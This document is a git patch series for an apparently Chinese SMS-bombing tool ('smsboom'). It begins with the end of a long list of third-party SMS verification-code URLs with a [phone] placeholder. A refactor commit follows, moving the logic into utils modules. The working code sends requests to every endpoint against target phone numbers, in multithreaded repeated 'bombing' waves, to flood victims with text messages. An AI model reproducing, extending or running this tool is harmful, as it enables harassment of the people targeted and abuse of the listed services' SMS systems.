"https://logic-zone-10007.api.xlgxapp.com/315000/rider/api/v3/message/[phone]?event=OneKeyLogin", + "http://www.wsngo.com/reg/sendSmsCheck.html?phone=[phone]", + "http://bdp.haoyisheng.com/bdp/checkCode/getChkCode?timestamp=1600272327075mobileNum=[phone]", + "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", + "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", + "http://www.atmyjr.com/user/ashx/ajax.ashxaction=telyuyin&mid=17433&v=1438962406156&txtMobile=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://www.line0.com/usercenter/voiceVerificationCodeUserLogin.do?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]", + "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", + "http://ucenter.inyuapp.com/v1/login/mobile/code?mobile=[phone]&country_code=86", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi 4A&osLevel=23&phone=[phone]&token=", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", + "http://ffp.airchina.com.cn/app/generateSmscode?phoneNum=[phone]&t=0.5165145328970137", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "https://eapi.huolala.cn/?_m=account&_a=sms_code&args=%7B%22phone_no%22%3A%22[phone]", + "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]", + "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", + "http://hyuser.91huayi.com/ashx/sendSmsValidateCode.ashx?mobile=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", + "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", + "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", + "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://gj.liansuosoft.com/ShopRegister/SendSms?mobile=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://www.txooo.com/Txooo/Main/Busine**\u5c4f\u853d\u654f\u611f\u8bcd**equirement/Ajax/Busine**\u5c4f\u853d\u654f\u611f\u8bcd**equirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://www.bjoil.com/bjoil/member/mobileVerify.action?tamp=1479798866609/bjoil/member/mobileVerify.action?tamp=1479798866609/bjoil/member/mobileVerify.action?tamp=1479798866609&mobile=[phone]", + "http://1314.buzz:80/index.php?hm=[phone]", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", + "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "http://www.vatti.com.cn/index.php?m=Home&c=Api&a=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", + "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", + "http://www.12chu.com/reg/sendCode.jhtml?mobile=[phone]", + "https://www.guiji.ai/market/sms?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "https://cfapi.yaomengwang.cn/local/v1/account/regist/sms?mobile=[phone]", + "http://www.595959.wang/index.php/index/index/sendSms1?phone=[phone]", + "http://api.juewei.com//api/Verify/sendSms?_=[phone]", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "http://bbs.fqlook.cn/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=7290e7db&mobile=[phone]", + "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", + "http://m.ikuyu.cn/login/getvcode?phone=[phone]", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=+86-[ph", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://readapp.ddyvip.cn/app/user/sendLoginCode.api?appVersion=2.4.4&inviteCode=&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=AppStore-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", + "http://www.edu-edu.com/cas/web/message/send?phone=[phone]&isNewPhone=true", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://jzplatform.com/distributor/sendcode_do.php e.account=[phone]", + "http://www.dingapp.com/sendUserValidCode.action?mobile=[phone]", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1592528454449", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]", + "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]", + "http://www.passpay.net/login/sendVerifyCode?mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", + "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", + "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", + "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://uss.lenovomm.com/accounts/1.4/sendVerifyCode?msisdn=[phone]", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", + "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]" ] From 2f62a1e1a747227434cc216c569f1d3bc40153ab Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Mon, 9 May 2022 00:58:03 +0800 Subject: [PATCH 8/8] =?UTF-8?q?=F0=9F=A6=84=20refactor:=20=E4=BC=98?= =?UTF-8?q?=E5=8C=96=E9=A1=B9=E7=9B=AE=E7=BB=93=E6=9E=84=EF=BC=8C=E4=BC=98?= =?UTF-8?q?=E5=8C=96=E6=97=A5=E5=BF=97=E6=98=BE=E7=A4=BA=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- smsboom.py | 73 ++++++++++++----------------------------------- utils.py | 59 -------------------------------------- utils/__init__.py | 3 ++ utils/log.py | 44 ++++++++++++++++++++++++++++ utils/models.py | 53 ++++++++++++++++++++++++++++++++++ utils/req.py | 40 ++++++++++++++++++++++++++ utils/sql.py | 63 ++++++++++++++++++++++++++++++++++++++++ 7 files changed, 221 insertions(+), 114 deletions(-) create mode 100644 utils/__init__.py create mode 100644 utils/log.py create mode 100644 utils/models.py create mode 100644 utils/req.py create mode 100644 utils/sql.py diff --git a/smsboom.py b/smsboom.py index 2b9c92e..af5d30d 100755 --- a/smsboom.py +++ b/smsboom.py @@ -1,26 +1,19 @@ # encoding=utf8 # 短信测压主程序 +import json import pathlib import sys -from typing import List, Union -import click -import json -import httpx -from loguru import logger -from concurrent.futures import ThreadPoolExecutor import time -import sys +from concurrent.futures import ThreadPoolExecutor +from typing import List, Union -from utils import API, default_header +import click +import httpx -# logger config -logger.remove() -logger.add( - sink=sys.stdout, - format="{time:YYYY-MM-DD at HH:mm:ss} - {level} - {message}", - colorize=True, - backtrace=True -) +from utils import default_header +from utils.log import logger +from utils.models import API +from utils.req import reqFunc # current directory path = pathlib.Path(__file__).parent @@ -70,38 +63,6 @@ def load_getapi() -> list: # return None raise ValueError -def reqAPI(api: API, client: httpx.Client) -> httpx.Response: - if isinstance(api.data, dict): - resp = client.request(method=api.method, json=api.data, - headers=api.header, url=api.url) - else: - resp = client.request(method=api.method, data=api.data, - headers=api.header, url=api.url) - return resp - - -def req(api: Union[API, str], phone: tuple): - """请求接口方法""" - # 多手机号支持 - if isinstance(phone, tuple): - phone_lst = [_ for _ in phone] - else: - phone_lst = [phone] - - with httpx.Client(headers=default_header, verify=False) as client: - for ph in phone_lst: - try: - if isinstance(api, API): - api = api.handle_API(ph) - resp = reqAPI(api, client) - logger.info(f"{api.desc}-{resp.text[:30]}") - else: - api = api.replace("[phone]", ph) - resp = client.get(url=api, headers=default_header) - logger.info(f"GETAPI接口-{resp.text[:30]}") - except httpx.HTTPError as why: - logger.error(f"请求失败{why}") - @click.command() @click.option("--thread", "-t", help="线程数(默认64)", default=64) @@ -126,16 +87,16 @@ def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = Fals i += 1 logger.success(f"第{i}波轰炸开始!") for api in _api: - pool.submit(req, api, phone) + pool.submit(reqFunc, api, phone) for api_get in _api_get: - pool.submit(req, api_get, phone) + pool.submit(reqFunc, api_get, phone) logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....") time.sleep(interval) else: for api in _api: - pool.submit(req, api, phone) + pool.submit(reqFunc, api, phone) for api_get in _api_get: - pool.submit(req, api_get, phone) + pool.submit(reqFunc, api_get, phone) @click.command() @@ -147,9 +108,11 @@ def update(): try: with httpx.Client(verify=False, timeout=10) as client: # print(API_json_url) - GETAPI_json = client.get(GETAPI_json_url, headers=default_header).content.decode(encoding="utf8") - api_json = client.get(API_json_url, headers=default_header).content.decode(encoding="utf8") - + GETAPI_json = client.get( + GETAPI_json_url, headers=default_header).content.decode(encoding="utf8") + api_json = client.get( + API_json_url, headers=default_header).content.decode(encoding="utf8") + except Exception as why: logger.error(f"拉取更新失败:{why}请关闭所有代理软件多尝试几次!") else: diff --git a/utils.py b/utils.py index 4dbafae..0c2fc83 100755 --- a/utils.py +++ b/utils.py @@ -12,65 +12,6 @@ default_header = { } -class Sql(object): - """处理SQL数据""" - - def __init__(self) -> None: - '''初始化数据库''' - # 数据库路径 - db_path = Path.cwd().joinpath("api.db") - # 连接数据库,不检查是否在同一个路径. - self.client = sqlite3.connect( - db_path, timeout=6, check_same_thread=False) - self.cursor = self.client.cursor() - self.newTable() - - def newTable(self): - '''初始化表结构''' - sql = ''' -CREATE TABLE IF NOT EXISTS API200 ( - id INT NULL, - url TEXT NOT NULL, - primary key (url) -); - ''' - self.cursor.execute(sql) - self.client.commit() - - def update(self, url): - '''插入数据''' - sql = ''' - INSERT INTO API200 (ID,url) VALUES (null,?) - ''' - try: - self.cursor.execute(sql, (url,)) - self.client.commit() - return True - except sqlite3.IntegrityError: - # print(f"{url} 数据重复!") - return False - - def select(self) -> list: - '''获取所有接口''' - sql = ''' - SELECT url FROM API200; - ''' - try: - self.cursor.execute(sql) - result = self.cursor.fetchall() - urls = [] - for url in result: - urls.append(url[0]) - return urls - except Exception as e: - print('读取出现错误!', e) - - def __del__(self) -> None: - '''对象被删除时执行的函数''' - print(f"共改变{self.client.total_changes}条数据!,正在关闭数据库连接......") - self.client.close() - - class API(BaseModel): """处理自定义 API 数据""" desc: str = "Default" diff --git a/utils/__init__.py b/utils/__init__.py new file mode 100644 index 0000000..de412fe --- /dev/null +++ b/utils/__init__.py @@ -0,0 +1,3 @@ +default_header = { + "User-Agent": "Mozilla/5.0 (Linux; U; Android 10; zh-cn; Mi 10 Build/QKQ1.191117.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.147 Mobile Safari/537.36 XiaoMi/MiuiBrowser/13.5.40" +} \ No newline at end of file diff --git a/utils/log.py b/utils/log.py new file mode 100644 index 0000000..90490e5 --- /dev/null +++ b/utils/log.py @@ -0,0 +1,44 @@ +# encoding=utf8 +# 日志模块 +from loguru import logger +import pathlib +import sys +import os + +# 终端日志输出格式 +stdout_fmt = '{level.icon} {time:HH:mm:ss,SSS} ' \ + '[{level}] ' \ + '{thread.name} ' \ + '{module}:{line} - ' \ + '{message}' + +# 日志文件记录格式 +# logfile_fmt = '{time:YYYY-MM-DD HH:mm:ss,SSS} ' \ +# '[{level: <5}] ' \ +# '{process.name}({process.id}):' \ +# '{thread.name: <10}({thread.id: <5}) | ' \ +# '{module}.{function}:' \ +# '{line} - {message}' + +logfile_fmt = '{time:YYYY-MM-DD HH:mm:ss,SSS} ' \ + '[{level}] ' \ + '{module}.{function}:' \ + '{line} - {message}' + +log_pathDir = pathlib.Path(os.getcwd()).resolve().joinpath('logs') +if not log_pathDir.is_dir(): + log_pathDir.mkdir() +log_path = log_pathDir.joinpath('run.log').resolve() + +logger.remove() + +if not os.environ.get('PYTHONIOENCODING'): # 设置编码 + os.environ['PYTHONIOENCODING'] = 'utf-8' + +logger.add(sys.stderr, level='INFO', format=stdout_fmt, enqueue=True) +# 输出到文件 +# logger.add(log_path, level='DEBUG', format=logfile_fmt, +# enqueue=True, encoding='utf-8') + +if __name__ == "__main__": + logger.info("test") diff --git a/utils/models.py b/utils/models.py new file mode 100644 index 0000000..8889485 --- /dev/null +++ b/utils/models.py @@ -0,0 +1,53 @@ +# encoding=utf8 +# 一些模型 +from pydantic import BaseModel +from typing import Union, Optional +from datetime import datetime +import json +from utils import default_header + +class API(BaseModel): + """处理自定义 API 数据""" + desc: str = "Default" + url: str + method: str = "GET" + header: Optional[Union[str, dict]] = default_header + data: Optional[Union[str, dict]] + + def replace_data(self, content: Union[str, dict], phone: str) -> str: + # 统一转换成 str 再替换. ' -> " + if phone: + content = str(content).replace("[phone]", phone).replace( + "[timestamp]", self.timestamp_new()).replace("'", '"') + + # 尝试 json 化 + try: + return json.loads(content.replace("'", '"')) + except: + return content + + def timestamp_new(self) -> str: + """返回整数字符串时间戳""" + return str(int(datetime.now().timestamp())) + + def handle_API(self, phone: str=None): + """ 传入手机号处理 API + :param API: one API basemodel + :return: API basemodel + """ + # 仅仅当传入 phone 参数时添加 Referer + # fix: 这段代码很有问题....... + if phone: + # 进入的 header 是个字符串 + if self.header == "": + self.header = {} + self.header['Referer'] = self.url # 增加 Referer + + self.header = self.replace_data(self.header, phone) + if not self.header.get('Referer'): + self.header['Referer'] = self.url # 增加 Referer + + self.data = self.replace_data(self.data, phone) + self.url = self.replace_data(self.url, phone) + # print(self) + return self diff --git a/utils/req.py b/utils/req.py new file mode 100644 index 0000000..1668617 --- /dev/null +++ b/utils/req.py @@ -0,0 +1,40 @@ +# encoding=utf8 +# 请求的方法 +import httpx +from typing import Union + +from utils import default_header +from utils.models import API +from utils.log import logger + +def reqAPI(api: API, client: httpx.Client) -> httpx.Response: + if isinstance(api.data, dict): + resp = client.request(method=api.method, json=api.data, + headers=api.header, url=api.url) + else: + resp = client.request(method=api.method, data=api.data, + headers=api.header, url=api.url) + return resp + + +def reqFunc(api: Union[API, str], phone: tuple): + """请求接口方法""" + # 多手机号支持 + if isinstance(phone, tuple): + phone_lst = [_ for _ in phone] + else: + phone_lst = [phone] + + with httpx.Client(headers=default_header, verify=False) as client: + for ph in phone_lst: + try: + if isinstance(api, API): + api = api.handle_API(ph) + resp = reqAPI(api, client) + logger.info(f"{api.desc}-{resp.text[:30]}") + else: + api = api.replace("[phone]", ph) + resp = client.get(url=api, headers=default_header) + logger.info(f"GETAPI接口-{resp.text[:30]}") + except httpx.HTTPError as why: + logger.error(f"请求失败{why}") diff --git a/utils/sql.py b/utils/sql.py new file mode 100644 index 0000000..3993aa1 --- /dev/null +++ b/utils/sql.py @@ -0,0 +1,63 @@ +# encoding=utf8 +# 读写sqlite数据库 +from pathlib import Path +import sqlite3 + +class Sql(object): + """处理SQL数据""" + + def __init__(self) -> None: + '''初始化数据库''' + # 数据库路径 + db_path = Path.cwd().joinpath("api.db") + # 连接数据库,不检查是否在同一个线程. + self.client = sqlite3.connect( + db_path, timeout=6, check_same_thread=False) + self.cursor = self.client.cursor() + self.newTable() + + def newTable(self): + '''初始化表结构''' + sql = ''' +CREATE TABLE IF NOT EXISTS API200 ( + id INT NULL, + url TEXT NOT NULL, + primary key (url) +); + ''' + self.cursor.execute(sql) + self.client.commit() + + def update(self, url): + '''插入数据''' + sql = ''' + INSERT INTO API200 (ID,url) VALUES (null,?) + ''' + try: + self.cursor.execute(sql, (url,)) + self.client.commit() + return True + except sqlite3.IntegrityError: + # print(f"{url} 数据重复!") + return False + + def select(self) -> list: + '''获取所有接口''' + sql = ''' + SELECT url FROM API200; + ''' + try: + self.cursor.execute(sql) + result = self.cursor.fetchall() + urls = [] + for url in result: + urls.append(url[0]) + return urls + except Exception as e: + print('读取出现错误!', e) + + def __del__(self) -> None: + '''对象被删除时执行的函数''' + print(f"共改变{self.client.total_changes}条数据!,正在关闭数据库连接......") + self.client.close() +